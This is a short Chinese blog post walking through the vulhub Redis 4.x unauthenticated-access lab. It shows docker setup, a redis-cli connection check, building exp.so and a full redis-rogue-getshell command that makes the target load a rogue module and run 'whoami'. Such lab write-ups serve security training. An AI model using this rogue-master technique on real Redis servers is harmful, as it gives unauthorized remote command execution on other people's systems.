当前位置: 首页 > article >正文

vulhub redis-4-unacc

article 2025/1/23 13:08:47

环境搭建

cd vulhub/redis/4-unacc
docker-compose up -d

漏洞复现

检测

redis-cli -h ip

使用redis工具

工具地址:https://github.com/vulhub/redis-rogue-getshell

下载完成后,先进入RedisModulesSDK/exp/ 目录进行make操作

获得exp.so后可以进行命令执行

cd回redis-rogue-getshell-master/路径

命令执行

whoami

python3 redis-master.py -r 192.168.41.130 -p 6379 -L 192.168.41.130 -P 8888 -f RedisModulesSDK/exp/exp.so -c "whoami"

uname -a


http://www.kler.cn/a/133729.html

相关文章:

  • Servlet快速入门
  • 【深度学习项目】语义分割-DeepLab网络(DeepLabV3介绍、基于Pytorch实现DeepLabV3网络)
  • Golang Gin系列-5:数据模型和数据库
  • (undone) 并行计算学习 (Day2: 什么是 “伪共享” ?)
  • 包文件分析器 Webpack Bundle Analyzer
  • Python基础学习(六)unittest 框架
  • ​软考-高级-系统架构设计师教程(清华第2版)【第14章 云原生架构设计理论与实践(P496~526)-思维导图】​
  • 文本向量化
  • PTA-6-42 设计门票(抽象类)
  • [C/C++] 数据结构 LeetCode:用队列实现栈
  • 【碰碰球】弹珠游戏-微信小程序项目开发流程详解
  • 【短文】【踩坑】可以在Qt Designer给QTableWidge添加右键菜单吗?
  • 最长回文子序列 递归与动态规划
  • 【精选】项目管理工具——Maven详解
  • STM32的启动流程
  • 数据双向 双向数据绑定
  • 【Promise12数据集】Promise12数据集介绍和预处理
  • odoo16前端框架源码阅读——env.js
  • 深度优化数据库性能:Linux 内核参数调整解析
  • ChatGPT 从零到一打造私人智能英语学习助手
  • 【JavaEE初阶】计算机是如何工作的
  • Leetcode经典题目之“双指针交换元素“类题目
  • 基于SSM的古董拍卖系统
  • 基础组件-流量回放平台设计
  • 单线程的JS中Vue导致的“线程安全”问题
  • 【FPGA】Verilog:实现 RS 触发器 | Flip-Flop | 使用 NOR 的 RS 触发器 | 使用 NAND 的 RS 触发器